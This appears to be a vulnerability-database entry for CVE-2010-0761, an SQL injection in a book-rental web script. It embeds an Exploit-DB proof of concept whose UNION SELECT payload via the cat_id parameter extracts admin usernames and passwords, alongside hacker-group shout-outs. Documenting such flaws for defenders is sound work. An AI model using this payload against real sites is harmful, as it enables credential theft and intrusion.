CVE-2010-0761
high
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
8.5
Description
SQL injection vulnerability in index.php in CommodityRentals Books/eBooks Rentals Script allows remote attackers to execute arbitrary SQL commands via the cat_id parameter in a gamecatalog action.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Books/eBooks Rental Software - SQL Injection
/**************************************************************************
[!] Books/eBooks Rental Software SQL injection Vulnerability
[!] Author : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage : http://www.indonesiancoder.com
[!] Date & Time : Thu Feb 10, 2010 5:55 PM
[!] Rock On : http://antisecradio.fm (choose your weapon)
**************************************************************************/
[ Software Information ]
[+] Vendor : http://www.commodityrentals.com/
[+] This script is specifically tailored for people wanting to start a Books/E-Books Rentals Business within a very short time.
Fully E-Commerce ready, this system comes with a Books attribute template and a fully customizable "look and feel" template of the site.
[+] Method : SQL Injection
[+] Dork : Don Tukulesto
===========================================================================
[ Proof of Concept ]
http://server/index.php?view=gamecatalog&cat_id=[INDONESIAN CODER NOT DEAD WITHOUT YOU]
[ EXPL0!T ]
2+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3+from+rental_admin--
[ D3M0 ]
http://server/index.php?view=gamecatalog&cat_id=2+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3+from+rental_admin--
===========================================================================
[ Remember the Name ]
[>] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown - SurabayaHackerLink
[>] kaMtiEz ~ M3NW5 ~ M364TR0N ~ Gonzhack ~ CYB3R_TR0N ~ DEESSAINT ~ ran ~ Arianom ~ Contrex
[>] Jack- ~ Yadoy666 ~ s4va ~ senot ~ Bayu5154 ~ VYC0D ~ Tucker ~ Ian Petrucii ~ Ronz & FeeLCoMz
[>] kecemplungkalen ~ DraCoola Multimedia ~ XNITRO ~ rey_cute ~ Awan Bejat ~ Plaque ~ Gh4mb4s
[>] Pathloader ~ tiw0L ~ Mboys ~ cimpli ~ d0ntcry ~ mbamboenk family ~ YOU !!!
[ rm -rf yourself ]
[>] FOR MALINGSIAL
[ some quotes ]
For FAKE Don Tukulesto on Facebook : http://www.facebook.com/profile.php?id=100000563647147
I know you don't like me, but do u know what ? YOU ARE A LOSER. lmaoApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| commodityrentals | books\/ebooks_rentals_script | | |
References
- http://osvdb.org/62277
- http://packetstormsecurity.org/1002-exploits/ebooksrental-sql.txt
- http://secunia.com/advisories/38520
- http://www.exploit-db.com/exploits/11402
- http://www.indonesiancoder.org/booksebooks-rental-software-sql-injection-vulnerability
- http://www.securityfocus.com/bid/38189
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56210
- http://osvdb.org/62277
- http://packetstormsecurity.org/1002-exploits/ebooksrental-sql.txt
- http://secunia.com/advisories/38520
- http://www.exploit-db.com/exploits/11402
- http://www.indonesiancoder.org/booksebooks-rental-software-sql-injection-vulnerability
- http://www.securityfocus.com/bid/38189
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56210
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.